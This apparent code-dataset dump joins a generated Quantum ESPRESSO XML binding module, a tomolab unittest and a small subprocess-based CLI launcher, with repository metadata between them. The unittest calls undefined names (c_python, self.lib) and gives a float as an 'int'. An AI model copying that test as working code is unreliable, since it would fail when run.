raise_parse_error(node, 'Invalid PositiveInteger')
value = find_attr_value_('dims', node)
if value is not None and 'dims' not in already_processed:
already_processed.add('dims')
self.dims = value
value = find_attr_value_('order', node)
if value is not None and 'order' not in already_processed:
already_processed.add('order')
self.order = value
value = find_attr_value_('xsi:type', node)
if value is not None and 'xsi:type' not in already_processed:
already_processed.add('xsi:type')
self.extensiontype_ = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class matrixType
class integerMatrixType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, rank=None, dims=None, order=None, valueOf_=None):
self.original_tagname_ = None
self.rank = _cast(int, rank)
self.dims = _cast(int, dims)
self.order = _cast(None, order)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, integerMatrixType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if integerMatrixType.subclass:
return integerMatrixType.subclass(*args_, **kwargs_)
else:
return integerMatrixType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_rank(self): return self.rank
def set_rank(self, rank): self.rank = rank
def get_dims(self): return self.dims
def set_dims(self, dims): self.dims = dims
def get_order(self): return self.order
def set_order(self, order): self.order = order
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
(1 if type(self.valueOf_) in [int,float] else self.valueOf_)
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='integerMatrixType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('integerMatrixType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='integerMatrixType')
if self.hasContent_():
outfile.write('>')
outfile.write(self.convert_unicode(self.valueOf_))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='integerMatrixType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='integerMatrixType'):
if self.rank is not None and 'rank' not in already_processed:
already_processed.add('rank')
outfile.write(' rank="%s"' % self.gds_format_integer(self.rank, input_name='rank'))
if self.dims is not None and 'dims' not in already_processed:
already_processed.add('dims')
outfile.write(' dims=%s' % (quote_attrib(self.dims), ))
if self.order is not None and 'order' not in already_processed:
already_processed.add('order')
outfile.write(' order=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.order), input_name='order')), ))
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='integerMatrixType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('rank', node)
if value is not None and 'rank' not in already_processed:
already_processed.add('rank')
try:
self.rank = int(value)
except ValueError as exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
if self.rank <= 0:
raise_parse_error(node, 'Invalid PositiveInteger')
value = find_attr_value_('dims', node)
if value is not None and 'dims' not in already_processed:
already_processed.add('dims')
self.dims = value
value = find_attr_value_('order', node)
if value is not None and 'order' not in already_processed:
already_processed.add('order')
self.order = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class integerMatrixType
class scalarQuantityType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Units=None, valueOf_=None):
self.original_tagname_ = None
self.Units = _cast(None, Units)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, scalarQuantityType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if scalarQuantityType.subclass:
return scalarQuantityType.subclass(*args_, **kwargs_)
else:
return scalarQuantityType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_Units(self): return self.Units
def set_Units(self, Units): self.Units = Units
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
(1 if type(self.valueOf_) in [int,float] else self.valueOf_)
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='scalarQuantityType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('scalarQuantityType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='scalarQuantityType')
if self.hasContent_():
outfile.write('>')
outfile.write(self.convert_unicode(self.valueOf_))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='scalarQuantityType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='scalarQuantityType'):
if self.Units is not None and 'Units' not in already_processed:
already_processed.add('Units')
outfile.write(' Units=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.Units), input_name='Units')), ))
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='scalarQuantityType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Units', node)
if value is not None and 'Units' not in already_processed:
already_processed.add('Units')
self.Units = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class scalarQuantityType
class equivalent_atomsType(integerVectorType):
subclass = None
superclass = integerVectorType
def __init__(self, size=None, nat=None, valueOf_=None):
self.original_tagname_ = None
super(equivalent_atomsType, self).__init__(size, valueOf_, )
self.nat = _cast(int, nat)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, equivalent_atomsType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if equivalent_atomsType.subclass:
return equivalent_atomsType.subclass(*args_, **kwargs_)
else:
return equivalent_atomsType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_nat(self): return self.nat
def set_nat(self, nat): self.nat = nat
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
(1 if type(self.valueOf_) in [int,float] else self.valueOf_) or
super(equivalent_atomsType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='equivalent_atomsType', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('equivalent_atomsType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='equivalent_atomsType')
if self.hasContent_():
outfile.write('>')
outfile.write(self.convert_unicode(self.valueOf_))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='equivalent_atomsType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='equivalent_atomsType'):
super(equivalent_atomsType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='equivalent_atomsType')
if self.nat is not None and 'nat' not in already_processed:
already_processed.add('nat')
outfile.write(' nat="%s"' % self.gds_format_integer(self.nat, input_name='nat'))
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='equivalent_atomsType', fromsubclass_=False, pretty_print=True):
super(equivalent_atomsType, self).exportChildren(outfile, level, namespaceprefix_, name_, True, pretty_print=pretty_print)
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('nat', node)
if value is not None and 'nat' not in already_processed:
already_processed.add('nat')
try:
self.nat = int(value)
except ValueError as exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
if self.nat <= 0:
raise_parse_error(node, 'Invalid PositiveInteger')
super(equivalent_atomsType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class equivalent_atomsType
class inputOccupationsType(vectorType):
subclass = None
superclass = vectorType
def __init__(self, size=None, ispin=None, spin_factor=None, valueOf_=None):
self.original_tagname_ = None
super(inputOccupationsType, self).__init__(size, valueOf_, )
self.ispin = _cast(int, ispin)
self.spin_factor = _cast(float, spin_factor)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, inputOccupationsType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if inputOccupationsType.subclass:
return inputOccupationsType.subclass(*args_, **kwargs_)
else:
return inputOccupationsType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ispin(self): return self.ispin
def set_ispin(self, ispin): self.ispin = ispin
def get_spin_factor(self): return self.spin_factor
def set_spin_factor(self, spin_factor): self.spin_factor = spin_factor
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
(1 if type(self.valueOf_) in [int,float] else self.valueOf_) or
super(inputOccupationsType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='inputOccupationsType', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('inputOccupationsType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='inputOccupationsType')
if self.hasContent_():
outfile.write('>')
outfile.write(self.convert_unicode(self.valueOf_))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='inputOccupationsType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='inputOccupationsType'):
super(inputOccupationsType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='inputOccupationsType')
if self.ispin is not None and 'ispin' not in already_processed:
already_processed.add('ispin')
outfile.write(' ispin="%s"' % self.gds_format_integer(self.ispin, input_name='ispin'))
if self.spin_factor is not None and 'spin_factor' not in already_processed:
already_processed.add('spin_factor')
outfile.write(' spin_factor="%s"' % self.gds_format_double(self.spin_factor, input_name='spin_factor'))
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='inputOccupationsType', fromsubclass_=False, pretty_print=True):
super(inputOccupationsType, self).exportChildren(outfile, level, namespaceprefix_, name_, True, pretty_print=pretty_print)
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('ispin', node)
if value is not None and 'ispin' not in already_processed:
already_processed.add('ispin')
try:
self.ispin = int(value)
except ValueError as exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
if self.ispin <= 0:
raise_parse_error(node, 'Invalid PositiveInteger')
value = find_attr_value_('spin_factor', node)
if value is not None and 'spin_factor' not in already_processed:
already_processed.add('spin_factor')
try:
self.spin_factor = float(value)
except ValueError as exp:
raise ValueError('Bad float/double attribute (spin_factor): %s' % exp)
super(inputOccupationsType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class inputOccupationsType
class Hubbard_nsType(matrixType):
subclass = None
superclass = matrixType
def __init__(self, rank=None, dims=None, order=None, specie=None, label=None, spin=None, index=None, valueOf_=None):
self.original_tagname_ = None
super(Hubbard_nsType, self).__init__(rank, dims, order, valueOf_, )
self.specie = _cast(None, specie)
self.label = _cast(None, label)
self.spin = _cast(int, spin)
self.index = _cast(int, index)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, Hubbard_nsType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if Hubbard_nsType.subclass:
return Hubbard_nsType.subclass(*args_, **kwargs_)
else:
return Hubbard_nsType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_specie(self): return self.specie
def set_specie(self, specie): self.specie = specie
def get_label(self): return self.label
def set_label(self, label): self.label = label
def get_spin(self): return self.spin
def set_spin(self, spin): self.spin = spin
def get_index(self): return self.index
def set_index(self, index): self.index = index
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
(1 if type(self.valueOf_) in [int,float] else self.valueOf_) or
super(Hubbard_nsType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='Hubbard_nsType', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('Hubbard_nsType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='Hubbard_nsType')
if self.hasContent_():
outfile.write('>')
outfile.write(self.convert_unicode(self.valueOf_))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='Hubbard_nsType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='Hubbard_nsType'):
super(Hubbard_nsType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='Hubbard_nsType')
if self.specie is not None and 'specie' not in already_processed:
already_processed.add('specie')
outfile.write(' specie=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.specie), input_name='specie')), ))
if self.label is not None and 'label' not in already_processed:
already_processed.add('label')
outfile.write(' label=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.label), input_name='label')), ))
if self.spin is not None and 'spin' not in already_processed:
already_processed.add('spin')
outfile.write(' spin="%s"' % self.gds_format_integer(self.spin, input_name='spin'))
if self.index is not None and 'index' not in already_processed:
already_processed.add('index')
outfile.write(' index="%s"' % self.gds_format_integer(self.index, input_name='index'))
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='Hubbard_nsType', fromsubclass_=False, pretty_print=True):
super(Hubbard_nsType, self).exportChildren(outfile, level, namespaceprefix_, name_, True, pretty_print=pretty_print)
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('specie', node)
if value is not None and 'specie' not in already_processed:
already_processed.add('specie')
self.specie = value
value = find_attr_value_('label', node)
if value is not None and 'label' not in already_processed:
already_processed.add('label')
self.label = value
value = find_attr_value_('spin', node)
if value is not None and 'spin' not in already_processed:
already_processed.add('spin')
try:
self.spin = int(value)
except ValueError as exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
if self.spin <= 0:
raise_parse_error(node, 'Invalid PositiveInteger')
value = find_attr_value_('index', node)
if value is not None and 'index' not in already_processed:
already_processed.add('index')
try:
self.index = int(value)
except ValueError as exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
if self.index <= 0:
raise_parse_error(node, 'Invalid PositiveInteger')
super(Hubbard_nsType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class Hubbard_nsType
class starting_nsType(vectorType):
subclass = None
superclass = vectorType
def __init__(self, size=None, specie=None, label=None, spin=None, valueOf_=None):
self.original_tagname_ = None
super(starting_nsType, self).__init__(size, valueOf_, )
self.specie = _cast(None, specie)
self.label = _cast(None, label)
self.spin = _cast(int, spin)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, starting_nsType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if starting_nsType.subclass:
return starting_nsType.subclass(*args_, **kwargs_)
else:
return starting_nsType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_specie(self): return self.specie
def set_specie(self, specie): self.specie = specie
def get_label(self): return self.label
def set_label(self, label): self.label = label
def get_spin(self): return self.spin
def set_spin(self, spin): self.spin = spin
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
(1 if type(self.valueOf_) in [int,float] else self.valueOf_) or
super(starting_nsType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='starting_nsType', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('starting_nsType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='starting_nsType')
if self.hasContent_():
outfile.write('>')
outfile.write(self.convert_unicode(self.valueOf_))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='starting_nsType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='starting_nsType'):
super(starting_nsType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='starting_nsType')
if self.specie is not None and 'specie' not in already_processed:
already_processed.add('specie')
outfile.write(' specie=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.specie), input_name='specie')), ))
if self.label is not None and 'label' not in already_processed:
already_processed.add('label')
outfile.write(' label=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.label), input_name='label')), ))
if self.spin is not None and 'spin' not in already_processed:
already_processed.add('spin')
outfile.write(' spin="%s"' % self.gds_format_integer(self.spin, input_name='spin'))
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='starting_nsType', fromsubclass_=False, pretty_print=True):
super(starting_nsType, self).exportChildren(outfile, level, namespaceprefix_, name_, True, pretty_print=pretty_print)
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('specie', node)
if value is not None and 'specie' not in already_processed:
already_processed.add('specie')
self.specie = value
value = find_attr_value_('label', node)
if value is not None and 'label' not in already_processed:
already_processed.add('label')
self.label = value
value = find_attr_value_('spin', node)
if value is not None and 'spin' not in already_processed:
already_processed.add('spin')
try:
self.spin = int(value)
except ValueError as exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
if self.spin <= 0:
raise_parse_error(node, 'Invalid PositiveInteger')
super(starting_nsType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class starting_nsType
GDSClassesMapping = {
'espresso': espressoType,
}
USAGE_TEXT = """
Usage: python <Parser>.py [ -s ] <in_xml_file>
"""
def usage():
print(USAGE_TEXT)
sys.exit(1)
def get_root_tag(node):
tag = Tag_pattern_.match(node.tag).groups()[-1]
rootClass = GDSClassesMapping.get(tag)
if rootClass is None:
rootClass = globals().get(tag)
return tag, rootClass
def parse(inFileName, silence=False):
parser = None
doc = parsexml_(inFileName, parser)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'espressoType'
rootClass = espressoType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
if not silence:
sys.stdout.write('<?xml version="1.0" ?>\n')
rootObj.export(
sys.stdout, 0, name_=rootTag,
namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"',
pretty_print=True)
return rootObj
def parseEtree(inFileName, silence=False):
parser = None
doc = parsexml_(inFileName, parser)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'espressoType'
rootClass = espressoType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
mapping = {}
rootElement = rootObj.to_etree(None, name_=rootTag, mapping_=mapping)
reverse_mapping = rootObj.gds_reverse_node_mapping(mapping)
if not silence:
content = etree_.tostring(
rootElement, pretty_print=True,
xml_declaration=True, encoding="utf-8")
sys.stdout.write(content)
sys.stdout.write('\n')
return rootObj, rootElement, mapping, reverse_mapping
def parseString(inString, silence=False):
'''Parse a string, create the object tree, and export it.
Arguments:
- inString -- A string. This XML fragment should not start
with an XML declaration containing an encoding.
- silence -- A boolean. If False, export the object.
Returns -- The root object in the tree.
'''
parser = None
rootNode= parsexmlstring_(inString, parser)
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'espressoType'
rootClass = espressoType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
if not silence:
sys.stdout.write('<?xml version="1.0" ?>\n')
rootObj.export(
sys.stdout, 0, name_=rootTag,
namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"')
return rootObj
def parseLiteral(inFileName, silence=False):
parser = None
doc = parsexml_(inFileName, parser)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'espressoType'
rootClass = espressoType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
if not silence:
sys.stdout.write('#from qes-1.0 import *\n\n')
sys.stdout.write('import qes-1.0 as model_\n\n')
sys.stdout.write('rootObj = model_.rootClass(\n')
rootObj.exportLiteral(sys.stdout, 0, name_=rootTag)
sys.stdout.write(')\n')
return rootObj
def main():
args = sys.argv[1:]
if len(args) == 1:
parse(args[0])
else:
usage()
if __name__ == '__main__':
#import pdb; pdb.set_trace()
main()
__all__ = [
"BerryPhaseOutputType",
"HubbardCommonType",
"HubbardJType",
"Hubbard_nsType",
"algorithmic_infoType",
"atomType",
"atomic_constraintType",
"atomic_constraintsType",
"atomic_positionsType",
"atomic_speciesType",
"atomic_structureType",
"band_structureType",
"bandsType",
"basisSetItemType",
"basisType",
"basis_setType",
"bfgsType",
"boundary_conditionsType",
"cellType",
"cell_controlType",
"closedType",
"control_variablesType",
"convergence_infoType",
"createdType",
"creatorType",
"dftType",
"dftUType",
"dipoleOutputType",
"ekin_functionalType",
"electric_fieldType",
"electron_controlType",
"electronicPolarizationType",
"equivalent_atomsType",
"esmType",
"espressoType",
"finiteFieldOutType",
"gateInfoType",
"gate_settingsType",
"general_infoType",
"hybridType",
"infoType",
"inputOccupationsType",
"inputType",
"integerMatrixType",
"integerVectorType",
"ion_controlType",
"ionicPolarizationType",
"k_pointType",
"k_points_IBZType",
"ks_energiesType",
"magnetizationType",
"matrixType",
"mdType",
"monkhorst_packType",
"occupationsType",
"opt_convType",
"outputElectricFieldType",
"outputPBCType",
"outputType",
"parallel_infoType",
"phaseType",
"polarizationType",
"qpoint_gridType",
"reciprocal_latticeType",
"scalarQuantityType",
"scf_convType",
"smearingType",
"speciesType",
"spinType",
"spin_constraintsType",
"starting_nsType",
"stepType",
"symmetriesType",
"symmetryType",
"symmetry_flagsType",
"total_energyType",
"vdWType",
"vectorType",
"wyckoff_positionsType",
"xml_formatType"
]
| 48.526131 | 436 | 0.634352 |
ff59b98ccd11d8990bcfc98c836d616f99646737 | 809 | py | Python | tomolab/Tests/test_all.py | TomographyLab/TomoLab | 86b9a5894ef1660d7f4de39f560f1f92024b40f8 | [
"Apache-2.0"
] | 5 | 2019-06-01T13:16:00.000Z | 2022-03-02T10:21:59.000Z | tomolab/Tests/test_all.py | TomographyLab/TomoLab | 86b9a5894ef1660d7f4de39f560f1f92024b40f8 | [
"Apache-2.0"
] | null | null | null | tomolab/Tests/test_all.py | TomographyLab/TomoLab | 86b9a5894ef1660d7f4de39f560f1f92024b40f8 | [
"Apache-2.0"
] | 1 | 2019-06-01T13:19:18.000Z | 2019-06-01T13:19:18.000Z | # -*- coding: utf-8 -*-
# occiput
# Harvard University, Martinos Center for Biomedical Imaging
# Aalto University, Department of Computer Science
from .. import occiput
import unittest
class Test_Reconstruction_PET(unittest.TestCase):
"""Sequence of tests for tomographic reconstruction - Positron Emission Tomography."""
def setUp(self):
pass
def test_projection_wrapper(self):
"""Test the Python wrapper for the projection algorithm. """
number = 0.1
descriptor = [
{"name": "input", "type": "int", "value": number},
{"name": "output", "type": "int", "value": None},
]
r = c_python.call_c_function(self.lib.echo, descriptor)
self.assertTrue(r.output == number)
if __name__ == "__main__":
unittest.main()
| 27.896552 | 90 | 0.640297 |
ee9e9872b84d1db23a951009afe2f34b8d7ed213 | 2,021 | py | Python | core_api/core_api/cli_entrypoint.py | ldss-hse/ldss-core-api | c0d9b1c8802a82acc8892bd397961b8d651d4c25 | [
"MIT"
] | null | null | null | core_api/core_api/cli_entrypoint.py | ldss-hse/ldss-core-api | c0d9b1c8802a82acc8892bd397961b8d651d4c25 | [
"MIT"
] | null | null | null | core_api/core_api/cli_entrypoint.py | ldss-hse/ldss-core-api | c0d9b1c8802a82acc8892bd397961b8d651d4c25 | [
"MIT"
] | null | null | null | import argparse
import os
import shlex
import subprocess
from threading import Timer
def run(cmd, timeout_sec):
proc = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
timer = Timer(timeout_sec, proc.kill)
try:
timer.start()
stdout, stderr = proc.communicate()
print(stdout)
print(stderr)
finally:
timer.cancel()
print(stdout)
print(stderr)
def parse_arguments():
parser = argparse.ArgumentParser(description='CLI Manager for Core API application')
parser.add_argument('--flask',
required=False,
default=False,
action='store_true',
help='Specifies whether to start Core API backend')
return parser.parse_args()
def main():
args = parse_arguments()
print('All arguments passed to CLI Manager')
print(args)
if args.flask:
print('Requested to run flask application, running...')
cmd = "../../venv/bin/python app.py > /Users/demidovs/Documents/projects/1_hse/ldss-core-api/core_api/core_api/log.txt"
cmds = shlex.split(cmd)
print(cmds)
# Examples: both take 1 second
run(cmd, 1) # process ends normally at 1 second
# res_process = subprocess.run(cmds,
# capture_output=True,
# # start_new_session=True,
# env=dict(os.environ,
# **{
# 'FLASK_ENV': 'development',
# 'FLASK_APP': 'core_api',
# })
# )
# print(f'SUBPROCESS: {str(res_process.stdout.decode("utf-8"))}')
# print(f'SUBPROCESS: {str(res_process.stderr.decode("utf-8"))}')
if __name__ == '__main__':
main()
| 31.578125 | 127 | 0.515092 |
db5667b9812f82997105def14aca88b0e476dfc1 | 39 | py | Python | src/petronia/boot/util/__init__.py | groboclown/petronia | 486338023d19cee989e92f0c5692680f1a37811f | [
"MIT"
] | 19 | 2017-06-21T10:28:24.000Z | 2021-12-31T11:49:28.000Z | src/petronia/boot/util/__init__.py | groboclown/petronia | 486338023d19cee989e92f0c5692680f1a37811f | [
"MIT"
] | 10 | 2016-11-11T18:57:57.000Z | 2021-02-01T15:33:43.000Z | src/petronia/boot/util/__init__.py | groboclown/petronia | 486338023d19cee989e92f0c5692680f1a37811f | [
"MIT"
